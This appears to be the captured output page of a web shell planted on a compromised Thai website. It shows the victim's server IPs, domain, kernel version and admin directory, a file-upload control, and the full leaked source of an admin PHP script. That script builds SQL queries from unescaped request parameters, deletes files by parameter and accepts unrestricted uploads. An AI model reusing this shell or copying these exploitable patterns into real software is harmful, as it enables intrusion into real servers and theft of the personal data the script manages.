1337 3YP455 5H311
:
216.73.216.113
:
119.59.104.17 / hrdigest.co.th
:
Linux re1.hostinglotus.net 4.18.0-553.58.1.el8_10.x86_64 #1 SMP Wed Jun 25 06:37:46 EDT 2025 x86_64
:
/
home
/
hrdigest
/
public_html
/
admin
/
UP104D F1L3:
files >> /home/hrdigest/public_html/admin/auto_form.php
<? // *****Copy right 2003 ,TNS NETWORK LTD.,PART.***** // require("../inc/function_admin.php"); $mem = checkid(); $id_pk = "id"; $tb = $_GET[tb] ; if($_GET["action"] == "Delete" && !empty($_GET["id"])){ mysql_query("Delete From `$tb` Where `id` = '$_GET[id]'"); @header("Location: auto_form.php?tb=$_GET[tb]"); exit; } if($_GET[action] == "remove"){ if(!empty($_GET[im])){ @unlink("../images/webpage/$_GET[im]"); } mysql_query("Update `$_GET[tb]` Set `$_GET[na]` = '' Where `id` = '$_GET[id]' ") or die ("Can't Perform Query 0"); header("Location: autoform.php?tb=$_GET[tb]&action=Edit&id=$_GET[id]"); exit; } if(!empty($_POST["action"])){ $a_in = ""; $b_in = ""; $a_up = ""; $fields = array_keys($_POST); for($i = 0; $i < count($fields); $i++){ $actual_var = $fields[$i]; $actual_val = stripslashes($_POST[$actual_var]); $actual_val = addslashes($actual_val); if($actual_var <> "Submit"){ if($actual_var <> "action"){ if($actual_var <> "id"){ if($actual_var <> "tb"){ if($actual_var <> "images"){ if($actual_var <> "default_page"){ if($actual_var <> "submit"){ if($actual_var == "pass"){ $a_in .= " `$actual_var` ,"; $b_in .= " '" . $actual_val."' ,"; $a_up .= " `$actual_var` = '" . $actual_val ."' ,"; }else{ $a_in .= " `$actual_var` ,"; $b_in .= " '$actual_val' ,"; $a_up .= " `$actual_var` = '$actual_val' ,"; } } // End If } // End If } // End If } // End If } // End If } // End If } // End If } // End For $a_in = substr($a_in, 0, -1); $b_in = substr($b_in, 0, -1); $a_up = substr($a_up, 0, -1); $fields = array_keys($_FILES); for($i = 0; $i < count($fields); $i++){ $Picture = $fields[$i]; $$Picture = $_FILES[$Picture][tmp_name]; $$Picture_size = $_FILES[$Picture][size]; if(!empty($$Picture)){ $md5 = md5(time() . $Picture); $explode = explode(".", ereg_replace(" ", "", $_FILES[$Picture]["name"])); $$Picture_name = substr($md5, 0, 4) . substr($md5, -4, 4) . "." . strtolower($explode[count($explode) - 1]); if(!empty($images[$Picture])){ @unlink("../images/webpage/$images[$Picture]"); } @copy($$Picture , "../images/webpage/" . $$Picture_name); $a_in .= " , `$Picture`"; $b_in .= " , '" . $$Picture_name . "'"; $a_up .= " , `$Picture` = '" . $$Picture_name . "'"; } } if($_POST[action] == "Add"){ //echo "Insert Into `$_POST[tb]` ( $a_in ) Values ( $b_in )"; mysql_query("Insert Into `$_POST[tb]` ( $a_in ) Values ( $b_in )"); //@header("Location: auto_form.php?tb=$_POST[tb]&cname=$_GET[cname]"); $err = "ok"; //exit; }elseif($_POST[action] == "Update"){ mysql_query("Update `$_POST[tb]` Set $a_up Where `id` = '$_POST[id]'"); //echo ("Update `$_POST[tb]` Set $a_up Where `id` = '$_POST[id]'"); @header("Location: auto_form.php?tb=$_POST[tb]&id=$_POST[id]&action=Edit&err=ok"); $err = "ok"; exit; } } // End If //show name if ($_GET[tb]=="member") { $na = array( "user_id"=>"รหัส", "pass"=>"รหัสผ่าน", "pass_confirm"=>"ยืนยันรหัสผ่าน", "Title"=>"คำนำหน้า", "U_name"=>"ชื่อ", "U_surname"=>"นามสกุล", "U_sureng"=>"ชื่อ Eng", "U_surold"=>"นามสกุล Eng", "U_nameOld"=>"ชื่อเดิม", "U_surold"=>"นามสกุลเดิม", "U_Middle_name"=>"ชื่อกลาง", "Previous_Middle_name"=>"Previous_Middle_name", "IdCard"=>"เลขบัตรประชาชน", "U_sex"=>"เพศ", "U_birth"=>"วันเกิด", "BirthPlace"=>"จังหวัดเกิด", "HomeNo"=>"บ้านเลขที่", "HomeSoi"=>"ซอย", "HomeMoo"=>"หมู่", "HomeRoad"=>"ถนน", "HomeAmphur"=>"อำเภอ/เขต", "HomeTumbon"=>"ตำบล/แขวง", "HomeProvince"=>"จังหวัด", "HomePostcode"=>"รหัสไปรษณีย์", "Country"=>"ประเทศ", "Email"=>"Email", "MobilePhone"=>"โทรศัพท์มือถือ", "Telephone"=>"โทรศัพท์", "UniversityTH"=>"มหาวิทยาลัย", "UniversityEN"=>"มหาวิทยาลัย Eng", "LevelStudy"=>"ระดับการศึกษา", "StartYear"=>"ปีที่เข้าศึกษา", "GraduateYear"=>"ปีที่จบการศึกษา", "StudentID"=>"รหัสนักศึกษา", "FacultyTH"=>"คณะ", "FacultyEN"=>"คณะ Eng", "BranchTH"=>"สาขา", "BranchEN"=>"สาขา Eng", "DegreeTH"=>"ชื่อปริญญา", "DegreeEN"=>"ชื่อปริญญา Eng", "Employer_Name"=>"โทรศัพท์", "Employer_City"=>"มหาวิทยาลัย", "Employer_Country"=>"มหาวิทยาลัย Eng", "JobType"=>"ระดับการศึกษา", "JobPositionType"=>"ประเภทตำแหน่ง", "JobPositionGroup"=>"กลุ่มอาชีพ", "JobPosition"=>"ตำแหน่ง", "WorkPlace"=>"สถานที่ทำงาน", "WorkLocation"=>"ที่อยู่ ที่ทำงาน", "WorkSoi"=>"ซอย ที่ทำงาน", "WorkRoad"=>"ถนน ที่ทำงาน", "WorkMoo"=>"หมู่ ที่ทำงาน", "WorkTumbon"=>"ตำบล/แขวง ที่ทำงาน", "WorkAmphur"=>"อำเภอ/เขต ที่ทำงาน", "WorkProvince"=>"จังหวัด ที่ทำงาน", "WorkPostcode"=>"สาขา Eng", ); //show data $na_show = array( "user"=>"1", "ThaiFName"=>"1", "ThaiLName"=>"1", "Telephone"=>"1", "FacultyName"=>"1" ); //no show detail $na_noshow = array( "type"=>"1", "style"=>"1", "confirm"=>"1", ); //show Topic $na_line = array( "id"=>"ALUMNI ACCOUNT DETAILS", "Title" => "PERSONAL DETAILS", "ProgramCode" => "Education", "Title" => "PERSONAL DETAILS", "Title" => "PERSONAL DETAILS", ); } if ($_GET[tb]=="mem_faculty") { $na = array( "id"=>"ID", "FacultyCode"=>"รหัส FacultyCode", "FactEName"=>"ชื่อคณะ/ สาขา ภาษาอังกฤษ", "FactTName"=>"ชื่อคณะ/ สาขา ภาษาไทย"); //show data $na_show = array( "id"=>"1", "FacultyCode"=>"1", "FactEName"=>"1", "FactTName"=>"1"); $na_line = array( ); } ?> <html> <head> <? require("../inc/title.php") ?> <meta http-equiv="Content-Type" content="text/html; charset=utf8"> <link href="index.css" rel="stylesheet" type="text/css"> <? include("bootstrap_seting.php"); ?> <script language="javascript" type="text/javascript"> <!-- function Delete(id){ if(confirm("คุณต้องการลบข้อมูลนี้หรือไม่ ?")){ if(confirm("ยืนยันการลบอีกครั้ง ?")){ location = "auto_form.php?tb=<? echo $_GET["tb"] ?>&action=Delete&id=" + id; } } } --> </script> <script type="text/javascript"> $(function () { $('#datetimepicker1').datetimepicker(); }); </script> <style> .txt_lable { padding: 10px 0 10px 5 } .txt_box { padding: 5px 0 5px 5; font-size:16px; } </style> </head> <body bgcolor="#ffffff"><input class="datetimepicker1" data-date-format="mm/dd/yyyy"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="top"><? top_page() ?></td> </tr> </table> <table width="100%" height="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td width="200" valign="top" background="icon/bgbar.jpg"><? require("menu.php") ?></td> <td valign="top"><table width="95%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td valign="top"><table width="100%" border="0" cellpadding="5" cellspacing="0" class="main"> <tr> <td><b>:: นำเข้าข้อมูล ::</b></td> </tr> </table> <table width="100%" border="0" cellpadding="5" cellspacing="0" class="main"> <tr> <td height="24" align="right"><a href="page_auto_form.php?name=<? echo $_GET["name"] ?>&status=<? echo $_GET["status"] ?>&action=Add"></a></td> </tr> </table> <? if ($_GET[err] == "ok" || $err == "ok") { ?> <table width="100%" border="0" cellpadding="0" cellspacing="0" class="main"> <tr> <td width="4%" bgcolor="#E1FEC5"><div align="center">OK</div></td> <td width="96%" bgcolor="#E1FEC5"><strong>บันทึกรายการเรียบร้อยแล้ว</strong></td> </tr> </table> <? $_GET[err]= ""; } ?> <? if ($_GET[err] == "noadd") { ?> <table width="100%" border="0" cellpadding="0" cellspacing="0" class="main"> <tr> <td width="4%" bgcolor="#FFCCD9"><div align="center">NO</div></td> <td width="96%" bgcolor="#FFCCD9"><strong>ไม่สามารถเพิ่มข้อมูลเนื่องจากมีการใช้ User Name นี้แล้ว </strong></td> </tr> </table> <? $_GET[err]= ""; } if(empty($_GET["action"])){ ?> <table width="100%" border="0" cellpadding="5" cellspacing="0" class="main"> <tr> <form name="form1" method="post" action=""> <td width="48%" align="right"><a href="auto_form.php?action=Add"></a></td> </form> <td width="50%" align="right"><a href="auto_form.php?tb=<?=$_GET[tb]?>&action=Add">ADD NEW DATA</a> | <a href="auto_insert.php?tb=<?=$_GET[tb]?>">INSERT TO EXCEL</a> | <a href="auto_export.php?tb=<?=$_GET[tb]?>">EXPORT TO EXCEL</a></td> <td width="2%" align="right"> </td> </tr> </table> <style type="text/css" title="currentStyle"> @import "css/demo_page.css"; @import "css/demo_table_jui.css"; @import "css/jquery-ui-1.8.4.custom.css"; </style> <script type="text/javascript" language="javascript" src="../js/jquery.dataTables.js"></script> <script type="text/javascript" charset="utf-8"> $(document).ready(function() { oTable = $('#example').dataTable({ "bJQueryUI": true, "sPaginationType": "full_numbers" }); } ); </script> <div class="demo_jui"> <table width="100%" border="0" cellpadding="3" cellspacing="1" class="display main6" id="example"> <thead> <tr > <? $i_col = 1; $i_col2 = 1; $result_col = mysql_query("SHOW COLUMNS FROM `$tb` "); $num_col = mysql_num_rows($result_col); while ($row_col = mysql_fetch_row($result_col)) { $name_col[$i_col] = $row_col[0]; $i_col++; if ($na_show[$row_col[0]]==1) { ?> <td width="18" ><?=$na[$row_col[0]]; ?></td> <? } } ?> <td width="55" align="center">แก้ไข</td> </tr> </thead> <? $st1=""; $st2=""; $result = mysql_query("Select * From `$tb` order by `$id_pk` desc "); while($row = mysql_fetch_array($result)){ ?> <tr> <? for ($i_col2=1;$i_col2 <=$num_col;$i_col2++){ $i_name = $name_col[$i_col2]; if ($na_show[$i_name]==1) { echo "<td>"; echo $row[$i_name]."</td>"; } } ?> <td align="center"><a href="auto_form.php?tb=<?=$_GET[tb]?>&action=Edit&id=<? echo $row["id"] ?><?=$st1?><?=$st2?>"><img src="icon/show.gif" border="0" /></a> <a href="javascript:Delete('<? echo $row["id"] ?>');"><img src="icon/del.gif" border="0" /></a></td> </tr> <? } ?> </table> </div> </form> <? }elseif($_GET["action"] == "Add"){ ?> <form method="post" enctype="multipart/form-data" > <div>Add New <? echo $_GET["cname"] ?></div> <? $result_col = mysql_query("SHOW COLUMNS FROM `$tb` "); $num_col = mysql_num_rows($result_col); while ($row_col = mysql_fetch_row($result_col)) { $e_col = $row_col[0]; if ($row_col[0]=="id") { if ($na_line[$e_col] <> "") { ?> <div style="clear:both;padding-top:20px;font-weight:bold;font-size:17px;"><?=$na_line[$e_col]; ?></div> <? } } else { if ($na_line[$e_col] <> "") { ?> <div style="clear:both;padding-top:20px;font-weight:bold;font-size:17px;"><?=$na_line[$e_col]; ?></div> <? } if ($na_noshow [$e_col] !=1) { ?> <div style="width:400px;float:left;position:relative;border:0px #009900 solid;"> <div class="txt_lable"><?=$na[$e_col]?></div> <? if (strstr("$e_col","file")){ ?> <input name="<? echo $row_col[0] ?>" type="file" class="txt_box" id="<? echo $row_col[0] ?>" /> <? }else{ ?> <input type="text" name="<? echo $row_col[0] ?>" value="" class="txt_box" style="width:350px;" /> <? } ?> </div> <? } } } ?> <div style="clear:both;padding-top:20px;"> <input name="submit" type="submit" class="main" style="width:200px;" value="Add New Data" /> <input name="button" type="button" class="main" style="width:80px;" onClick="location='auto_form.php?tb=<?=$_GET[tb]?>';" value="Back" /> <input type="hidden" name="action" value="Add" /> <input name="tb" type="hidden" id="tb" value="<?=$_GET[tb]?>" /> </div> </form> <? }elseif($_GET["action"] == "Edit" && $row = mysql_fetch_array(mysql_query("Select * From `$_GET[tb]` Where `$id_pk` = '$_GET[id]'"))){ $result_col = mysql_query("SHOW COLUMNS FROM `$tb` "); $num_col = mysql_num_rows($result_col); //echo $num_col; ?> <form method="post" enctype="multipart/form-data"> <div>Edit Data <? echo $_GET["cname"] ?></strong></div> <? while ($row_col = mysql_fetch_row($result_col)) { $e_col = $row_col[0]; $n_col = $row_col[0]; if (strpos("$e_col","SH")){ $e_col = substr($e_col,0,-2); } ?> <div style="width:400px;float:left;position:relative;border:0px #009900 solid;"> <div class="txt_lable"><?=$na[$e_col]?></div> <? if ($row_col[0]=="id") { ?> <input type="<?=$tt?>" name="<? echo $row_col[0] ?>" value="<? echo $row[$row_col[0]] ?>" class="txt_box" style="width:350px;" disabled /> <? } else { ?> <? if (strstr("$e_col","file")){ ?> <input name="<? echo $row_col[0] ?>" type="file" class="txt_box" id="<? echo $row_col[0] ?>" /> <? if(!empty($row[$n_col])){ echo "<a href='../images/webpage/$row[$n_col]' target='_blank'><img src='icon/b_image.gif' border='0' /></a> : <img style='cursor:pointer;' src='icon/del.gif' border='0' onClick=\"remove2('$row[id]' , '$row[$n_col]' , '$n_col');\" />"; } ?> <? }else{ if ($row_col[0] == "pass") { $tt = "password"; $showrow =$row[$row_col[0]]; }else{ $tt= "text"; $showrow = $row[$row_col[0]]; } ?> <input type="<?=$tt?>" name="<? echo $row_col[0] ?>" value="<? echo $showrow ?>" class="txt_box" style="width:350px;" /> <? } } ?></div> <? } ?> <div style="clear:both;padding-top:20px;"><input name="submit" type="submit" class="main" style="width:80px;" value=" Update " /> <input name="button" type="button" class="main" style="width:80px;" onClick="location='auto_form.php?tb=<?=$_GET[tb]?>';" value="Back" /> <input type="hidden" name="action" value="Update" /> <input name="tb" type="hidden" id="tb" value="<?=$_GET[tb]?>" /> <input name="id" type="hidden" id="id" value="<?=$_GET[id]?>" /> </div> </form> <? } ?></td> </tr> </table></td> </tr> </table> </body> </html>
1337r0j4n | 13379H0575 53CURI7Y 734M